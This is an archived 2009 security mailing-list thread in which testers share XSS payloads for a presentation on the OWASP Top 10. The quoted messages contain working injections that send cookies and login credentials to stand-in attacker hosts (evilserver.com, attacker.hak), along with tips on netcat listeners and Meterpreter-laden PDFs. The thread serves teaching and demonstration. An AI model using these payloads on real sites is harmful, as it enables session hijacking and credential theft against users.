PaulDotCom mailing list archives
Cool things to inject via XSS
From: mick at pauldotcom.com (Michael Douglas)
Date: Fri, 29 May 2009 07:45:10 -0400
While all these samples are really fun, I've lately had great luck by making two different XSS attacks when I'm showing folks. One for the devs -- this tends to be a bit more "fun" and does stuff like click trapping. For marketing or the project managers -- the ones I've found most likely to sweep these bugs under the rug -- I send them "brand damage" examples. (Cock ring size is freaking hilarious, but would send me to HR). So I do things like image swapping, or setting the background to a LOLCat or a competitor logo. The all time XSS FTW moment was about 4 years ago now, when someone found an XSS problem on a McDonald's site. Their link was so damn sweet, it's what got me interested in web app security. when you clicked it, you we sent to a page that had all the McD's wrappings but the content section of the window was blank except for in lovely red letters it said: "Hey FATTIE! You really shouldn't be eating our food!" On Fri, May 29, 2009 at 3:35 AM, <christopher.riley at r-it.at> wrote:
You could use a couple of typical password/cookie stealing examples. Cookie stealing iframe.: "><IFRAME SRC="javascript:window.location=%22http://evilserver.com/evil.php?stuff=%22+document.cookie" height="1" width="1" frameborder="0"></IFRAME> Altering the logon form.: "><script>window.onload = function()document.loginForm.action='http://evilserver.com/evil.php?details='</script><!---- I like to use the logon form example for my penetration testing presentations as it looks 100% normal to the user, except it redirects the Submit button to send the logon information (username/password in most cases) to your evilserver instead of the real server. You can also rewrite the code in the users browser to remove password hashing to make it easier to get the clear text password. On the server end I usually just put up a Metasploit HTTP or a netcat listener on the evilserver.com address to output the traffic to a logfile. You can also log it to a Database for mass farming of data, but we don't do that kind of thing, we leave that to Bob ;) If you want something evil on the client-side, try an iframe that references a PDF file. You can then export a PDF from Metasploit and embed the Meterpreter payload for total world domination. Chris John Riley pauldotcom-bounces at mail.pauldotcom.com@inet wrote on 28.05.2009 20:50:39:Ok, I've got yet another presentation coming up, this time on the OWASP Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The canonical example of course is: <script>alert("XSS");</script> but that is boring, and gives folks the impression that XSS is not that serious.? Better short eample swoul be: Redirect traffic to your site: <script>window.location = "http://www.irongeek.com/"</script> A little cookie Grabbing: <script> new Image().src="http://some-ip/mutillidae/catch.php?cookie= "+encodeURI(document.cookie); </script> Or maybe a password form to make people think they have to login, but it just grabs the credentials: <script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username= "+username+"&password="+password+"\">"); </script> What are other cool thing to inject, besides maybe BeEF, that shows of how XSS can be a big deal? Thanks, Adrian _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com---------------------------------------- Raiffeisen Informatik GmbH, Firmenbuchnr. 88239p, Handelsgericht Wien, DVR 0486809, UID ATU 16351908 Der Austausch von Nachrichten mit oben angefuehrtem Absender via E-Mail dient ausschliesslich Informationszwecken. Rechtsgeschaeftliche Erklaerungen duerfen ueber dieses Medium nicht ausgetauscht werden. Correspondence with above mentioned sender via e-mail is only for information purposes. This medium may not be used for exchange of legally-binding communications. ---------------------------------------- _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- Cool things to inject via XSS Adrian Crenshaw (May 28)
- Cool things to inject via XSS Michael McGrew (May 28)
- Cool things to inject via XSS Jim Halfpenny (May 28)
- Cool things to inject via XSS christopher.riley at r-it.at (May 29)
- Cool things to inject via XSS Michael Douglas (May 29)
- Cool things to inject via XSS packetjack (May 29)
- Cool things to inject via XSS Adrian Crenshaw (May 29)
- Cool things to inject via XSS Robin Wood (May 30)
- Finding the common thread... christopher.riley at r-it.at (Jun 15)
- Finding the common thread... Jim Halfpenny (Jun 15)
- Finding the common thread... christopher.riley at r-it.at (Jun 16)
- Cool things to inject via XSS Michael Douglas (May 29)